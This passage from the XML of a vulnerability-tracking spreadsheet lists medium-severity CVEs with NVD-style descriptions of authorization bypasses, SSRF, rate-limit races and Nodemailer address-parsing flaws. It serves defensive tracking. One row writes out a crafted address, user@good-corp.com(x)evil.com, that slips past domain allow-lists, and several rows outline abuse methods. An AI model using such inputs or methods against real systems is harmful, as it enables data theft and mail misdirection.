      </c>
      <c r="O950" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P950" s="5" t="inlineStr"/>
      <c r="Q950" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R950" s="5" t="inlineStr">
        <is>
          <t>reNgine through 2.2.0 contains an authorization bypass vulnerability in the GetFileContents API endpoint that allows any authenticated user to read bundled recon tool configuration files. Attackers with low-privilege Auditor roles can access files containing third-party API keys for services like SecurityTrails, Shodan, Censys, VirusTotal, BinaryEdge and Hunter by querying the endpoint without role-based permission checks.</t>
        </is>
      </c>
      <c r="S950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92570</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B951" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92583</t>
        </is>
      </c>
      <c r="D951" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E951" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F951" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G951" s="5" t="inlineStr"/>
      <c r="H951" s="5" t="inlineStr"/>
      <c r="I951" s="5" t="inlineStr"/>
      <c r="J951" s="5" t="inlineStr"/>
      <c r="K951" s="5" t="inlineStr"/>
      <c r="L951" s="5" t="inlineStr"/>
      <c r="M951" s="5" t="inlineStr"/>
      <c r="N951" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O951" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P951" s="5" t="inlineStr"/>
      <c r="Q951" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="R951" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 contains a race condition in the enforceRateLimit() function that fails to atomically increment rate limit counters, allowing attackers to bypass all rate limits including login brute-force protection by issuing concurrent requests. Attackers can submit parallel credential attempts to exceed the documented 30-attempts-per-5-minutes login limit by an arbitrary factor determined only by their connection concurrency.</t>
        </is>
      </c>
      <c r="S951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92583</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B952" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92597</t>
        </is>
      </c>
      <c r="D952" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E952" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F952" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G952" s="5" t="inlineStr"/>
      <c r="H952" s="5" t="inlineStr"/>
      <c r="I952" s="5" t="inlineStr"/>
      <c r="J952" s="5" t="inlineStr"/>
      <c r="K952" s="5" t="inlineStr"/>
      <c r="L952" s="5" t="inlineStr"/>
      <c r="M952" s="5" t="inlineStr"/>
      <c r="N952" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O952" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P952" s="5" t="inlineStr"/>
      <c r="Q952" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="R952" s="5" t="inlineStr">
        <is>
          <t>Nodemailer versions &gt;= 6.9.16 and &lt; 9.1.0 mis-parse RFC 5322 comments in email addresses: in lib/addressparser, a comment closed immediately before a non-break character causes the tokenizer to concatenate the atoms surrounding the comment instead of treating the comment as folding whitespace that terminates the domain. A recipient address such as user@good-corp.com(x)evil.com is therefore read by Nodemailer as the single domain good-corp.comevil.com (registrable domain comevil.com, which an attacker can register) and used for both the SMTP envelope (RCPT TO) and the emitted To:/From: headers, while a conformant RFC 5322 parser terminates the domain at the comment and reads good-corp.com. An application that validates the recipient domain with a strict RFC 5322 parser (without inspecting parse defects) or a naive prefix/substring allow-list and then hands the raw address to Nodemailer can be induced to deliver mail to a domain the attacker controls. Fixed in 9.1.0.</t>
        </is>
      </c>
      <c r="S952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92597</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B953" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92598</t>
        </is>
      </c>
      <c r="D953" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E953" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F953" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G953" s="5" t="inlineStr"/>
      <c r="H953" s="5" t="inlineStr"/>
      <c r="I953" s="5" t="inlineStr"/>
      <c r="J953" s="5" t="inlineStr"/>
      <c r="K953" s="5" t="inlineStr"/>
      <c r="L953" s="5" t="inlineStr"/>
      <c r="M953" s="5" t="inlineStr"/>
      <c r="N953" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O953" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P953" s="5" t="inlineStr"/>
      <c r="Q953" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="R953" s="5" t="inlineStr">
        <is>
          <t>Nodemailer before 9.1.0 fails to apply UTS-46 normalization when encoding international domain names, causing the domain resolver to compute a different Punycode A-label than standards-compliant parsers. Attackers can craft recipient addresses with invisible characters or compatibility mappings that pass domain allow-list checks but are delivered to attacker-controlled domains via SMTP.</t>
        </is>
      </c>
      <c r="S953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92598</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B954" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92600</t>
        </is>
      </c>
      <c r="D954" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E954" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F954" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G954" s="5" t="inlineStr"/>
      <c r="H954" s="5" t="inlineStr"/>
      <c r="I954" s="5" t="inlineStr"/>
      <c r="J954" s="5" t="inlineStr"/>
      <c r="K954" s="5" t="inlineStr"/>
      <c r="L954" s="5" t="inlineStr"/>
      <c r="M954" s="5" t="inlineStr"/>
      <c r="N954" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O954" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P954" s="5" t="inlineStr"/>
      <c r="Q954" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R954" s="5" t="inlineStr">
        <is>
          <t>Guns through 8.3.5 contains an information disclosure vulnerability in SysUserController where /sysUser/detail and /sysUser/page endpoints omit requiredPermission configuration, causing the permission interceptor to skip RBAC validation for authenticated users. Attackers with any valid login token can retrieve sensitive user information including account names, real names, email addresses, phone numbers, last login IPs, and role assignments for all users in the system.</t>
        </is>
      </c>
      <c r="S954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92600</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B955" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92603</t>
        </is>
      </c>
      <c r="D955" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E955" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F955" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G955" s="5" t="inlineStr"/>
      <c r="H955" s="5" t="inlineStr"/>
      <c r="I955" s="5" t="inlineStr"/>
      <c r="J955" s="5" t="inlineStr"/>
      <c r="K955" s="5" t="inlineStr"/>
      <c r="L955" s="5" t="inlineStr"/>
      <c r="M955" s="5" t="inlineStr"/>
      <c r="N955" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O955" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P955" s="5" t="inlineStr"/>
      <c r="Q955" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R955" s="5" t="inlineStr">
        <is>
          <t>ContiNew Admin through 4.1.0 contains an authorization bypass vulnerability in the personal message delete endpoint that allows authenticated users to delete other users' messages and announcements. Attackers can supply arbitrary message identifiers in the IdsReq parameter to remove any message row and purge all recipients' read receipts without ownership validation.</t>
        </is>
      </c>
      <c r="S955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92603</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B956" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92605</t>
        </is>
      </c>
      <c r="D956" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E956" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F956" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G956" s="5" t="inlineStr"/>
      <c r="H956" s="5" t="inlineStr"/>
      <c r="I956" s="5" t="inlineStr"/>
      <c r="J956" s="5" t="inlineStr"/>
      <c r="K956" s="5" t="inlineStr"/>
      <c r="L956" s="5" t="inlineStr"/>
      <c r="M956" s="5" t="inlineStr"/>
      <c r="N956" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O956" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P956" s="5" t="inlineStr"/>
      <c r="Q956" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R956" s="5" t="inlineStr">
        <is>
          <t>IRIS through 2.4.29 fails to properly validate case authorization in comment listing endpoints for notes, tasks, IOCs, assets, and evidence items. Attackers with access to any single case can enumerate sequential object identifiers and read comment threads from cases they have no authorization to access.</t>
        </is>
      </c>
      <c r="S956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92605</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B957" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92750</t>
        </is>
      </c>
      <c r="D957" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E957" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F957" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G957" s="5" t="inlineStr"/>
      <c r="H957" s="5" t="inlineStr"/>
      <c r="I957" s="5" t="inlineStr"/>
      <c r="J957" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K957" s="5" t="inlineStr"/>
      <c r="L957" s="5" t="inlineStr"/>
      <c r="M957" s="5" t="inlineStr"/>
      <c r="N957" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O957" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P957" s="5" t="inlineStr"/>
      <c r="Q957" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R957" s="5" t="inlineStr">
        <is>
          <t>Harness through 3.3.0 omits access control validation in the infrastructure provider read endpoint, allowing authenticated users to retrieve provider configurations from spaces they do not belong to. Attackers can query the GET /api/v1/infraproviders endpoint with arbitrary space identifiers to expose sensitive provider metadata including Docker endpoints, TLS certificate paths, and cloud project identifiers.</t>
        </is>
      </c>
      <c r="S957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92750</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B958" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92759</t>
        </is>
      </c>
      <c r="D958" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E958" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F958" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G958" s="5" t="inlineStr"/>
      <c r="H958" s="5" t="inlineStr"/>
      <c r="I958" s="5" t="inlineStr"/>
      <c r="J958" s="5" t="inlineStr"/>
      <c r="K958" s="5" t="inlineStr"/>
      <c r="L958" s="5" t="inlineStr"/>
      <c r="M958" s="5" t="inlineStr"/>
      <c r="N958" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O958" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P958" s="5" t="inlineStr"/>
      <c r="Q958" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R958" s="5" t="inlineStr">
        <is>
          <t>SecObserve versions before 1.59.1 contain an information disclosure vulnerability in the ApiConfigurationSerializer that fails to strip the basic_auth_password field from API configuration responses. View-only product members can retrieve the decrypted basic-auth password of configured scanner or integration service accounts through standard REST endpoints.</t>
        </is>
      </c>
      <c r="S958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92759</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B959" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92760</t>
        </is>
      </c>
      <c r="D959" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E959" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F959" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G959" s="5" t="inlineStr"/>
      <c r="H959" s="5" t="inlineStr"/>
      <c r="I959" s="5" t="inlineStr"/>
      <c r="J959" s="5" t="inlineStr"/>
      <c r="K959" s="5" t="inlineStr"/>
      <c r="L959" s="5" t="inlineStr"/>
      <c r="M959" s="5" t="inlineStr"/>
      <c r="N959" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O959" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P959" s="5" t="inlineStr"/>
      <c r="Q959" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R959" s="5" t="inlineStr">
        <is>
          <t>Shlink through 5.1.6 fails to enforce API key role restrictions when issuing Mercure subscription tokens, allowing restricted keys to subscribe to all topics. Attackers with author-only or domain-only keys can access the mercure-info endpoint to receive visit data including referrer, user agent, geolocation, and full short URL objects for URLs outside their authorization boundary.</t>
        </is>
      </c>
      <c r="S959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92760</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B960" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92765</t>
        </is>
      </c>
      <c r="D960" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E960" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F960" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G960" s="5" t="inlineStr"/>
      <c r="H960" s="5" t="inlineStr"/>
      <c r="I960" s="5" t="inlineStr"/>
      <c r="J960" s="5" t="inlineStr"/>
      <c r="K960" s="5" t="inlineStr"/>
      <c r="L960" s="5" t="inlineStr"/>
      <c r="M960" s="5" t="inlineStr"/>
      <c r="N960" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O960" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P960" s="5" t="inlineStr"/>
      <c r="Q960" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R960" s="5" t="inlineStr">
        <is>
          <t>ArcherySec through 2.0.6 fails to validate organization ownership in the WebScanVulnList endpoint, allowing authenticated users to read vulnerability findings from other organizations. Attackers can supply arbitrary scan identifiers to retrieve complete web vulnerability data including titles, severities, statuses, and analyst notes from other tenants.</t>
        </is>
      </c>
      <c r="S960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92765</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B961" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92770</t>
        </is>
      </c>
      <c r="D961" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E961" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F961" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G961" s="5" t="inlineStr"/>
      <c r="H961" s="5" t="inlineStr"/>
      <c r="I961" s="5" t="inlineStr"/>
      <c r="J961" s="5" t="inlineStr"/>
      <c r="K961" s="5" t="inlineStr"/>
      <c r="L961" s="5" t="inlineStr"/>
      <c r="M961" s="5" t="inlineStr"/>
      <c r="N961" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O961" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P961" s="5" t="inlineStr"/>
      <c r="Q961" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R961" s="5" t="inlineStr">
        <is>
          <t>Harbor through 2.15.2 fails to properly restrict the q query parameter filtering on scanner registration access credentials. Project administrators can exploit fuzzy filtering on the AccessCredential column to recover the scanner adapter secret one character at a time through response row counts.</t>
        </is>
      </c>
      <c r="S961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92770</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B962" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92771</t>
        </is>
      </c>
      <c r="D962" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E962" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F962" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G962" s="5" t="inlineStr"/>
      <c r="H962" s="5" t="inlineStr"/>
      <c r="I962" s="5" t="inlineStr"/>
      <c r="J962" s="5" t="inlineStr"/>
      <c r="K962" s="5" t="inlineStr"/>
      <c r="L962" s="5" t="inlineStr"/>
      <c r="M962" s="5" t="inlineStr"/>
      <c r="N962" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O962" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P962" s="5" t="inlineStr"/>
      <c r="Q962" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R962" s="5" t="inlineStr">
        <is>
          <t>Twenty before 2.35.0 fails to validate field and row permissions in the groupBy-with-records GraphQL resolver, allowing authenticated users to bypass permission checks. Attackers with canReadObjectRecords permission but canReadFieldValue false can retrieve restricted field values through the groupBy resolver that would normally be denied.</t>
        </is>
      </c>
      <c r="S962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92771</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B963" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92775</t>
        </is>
      </c>
      <c r="D963" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E963" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F963" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G963" s="5" t="inlineStr"/>
      <c r="H963" s="5" t="inlineStr"/>
      <c r="I963" s="5" t="inlineStr"/>
      <c r="J963" s="5" t="inlineStr"/>
      <c r="K963" s="5" t="inlineStr"/>
      <c r="L963" s="5" t="inlineStr"/>
      <c r="M963" s="5" t="inlineStr"/>
      <c r="N963" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O963" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P963" s="5" t="inlineStr"/>
      <c r="Q963" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R963" s="5" t="inlineStr">
        <is>
          <t>Wiki.js through 2.5.314 contains a server-side request forgery vulnerability in the Image Prefetch renderer that fetches arbitrary URLs without protocol, host, or address validation. Attackers with page editing permissions can inject img elements with the prefetch-candidate class to make the server request internal services and cloud metadata endpoints, with responses returned to the attacker.</t>
        </is>
      </c>
      <c r="S963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92775</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B964" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92789</t>
        </is>
      </c>
      <c r="D964" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E964" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F964" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G964" s="5" t="inlineStr"/>
      <c r="H964" s="5" t="inlineStr"/>
      <c r="I964" s="5" t="inlineStr"/>
      <c r="J964" s="5" t="inlineStr"/>
      <c r="K964" s="5" t="inlineStr"/>
      <c r="L964" s="5" t="inlineStr"/>
      <c r="M964" s="5" t="inlineStr"/>
      <c r="N964" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O964" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P964" s="5" t="inlineStr"/>
      <c r="Q964" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R964" s="5" t="inlineStr">
        <is>
          <t>Graylog through 7.1.4 validates outbound URLs against an allowlist before making requests but fails to re-validate after following HTTP redirects. Attackers with lookup table or event notification permissions can craft allowlisted endpoints that redirect to internal services, enabling the server to fetch and return internal responses.</t>
        </is>
      </c>
      <c r="S964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92789</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B965" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92790</t>
        </is>
      </c>
      <c r="D965" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E965" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F965" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G965" s="5" t="inlineStr"/>
      <c r="H965" s="5" t="inlineStr"/>
      <c r="I965" s="5" t="inlineStr"/>
      <c r="J965" s="5" t="inlineStr"/>
      <c r="K965" s="5" t="inlineStr"/>
      <c r="L965" s="5" t="inlineStr"/>
      <c r="M965" s="5" t="inlineStr"/>
      <c r="N965" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O965" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P965" s="5" t="inlineStr"/>
      <c r="Q965" s="5" t="inlineStr">
        <is>
          <t>CWE-703</t>
        </is>
      </c>
      <c r="R965" s="5" t="inlineStr">
        <is>
          <t>Higress before 2.2.4 panics when processing a Cookie header segment without an equals sign, causing the plugin wrapper to recover and return a continue action that bypasses AI token rate limiting. Unauthenticated attackers can craft a malformed Cookie header to skip rate limit checks and exceed thresholds intended to restrict costly model backend calls.</t>
        </is>
      </c>
      <c r="S965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92790</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B966" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92795</t>
        </is>
      </c>
      <c r="D966" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E966" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F966" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G966" s="5" t="inlineStr"/>
      <c r="H966" s="5" t="inlineStr"/>
      <c r="I966" s="5" t="inlineStr"/>
      <c r="J966" s="5" t="inlineStr"/>
      <c r="K966" s="5" t="inlineStr"/>
      <c r="L966" s="5" t="inlineStr"/>
      <c r="M966" s="5" t="inlineStr"/>
      <c r="N966" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O966" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P966" s="5" t="inlineStr"/>
      <c r="Q966" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R966" s="5" t="inlineStr">
        <is>
          <t>Coze Studio through 0.5.1 fails to restrict the server URL supplied when registering plugin tools, allowing authenticated users to make the backend fetch internal services. Attackers can construct plugin requests to access cloud metadata endpoints and internal services reachable only from the backend network, reading responses containing sensitive information.</t>
        </is>
      </c>
      <c r="S966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92795</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B967" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92811</t>
        </is>
      </c>
      <c r="D967" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E967" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F967" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G967" s="5" t="inlineStr"/>
      <c r="H967" s="5" t="inlineStr"/>
      <c r="I967" s="5" t="inlineStr"/>
      <c r="J967" s="5" t="inlineStr"/>
      <c r="K967" s="5" t="inlineStr"/>
      <c r="L967" s="5" t="inlineStr"/>
      <c r="M967" s="5" t="inlineStr"/>
      <c r="N967" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O967" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P967" s="5" t="inlineStr"/>
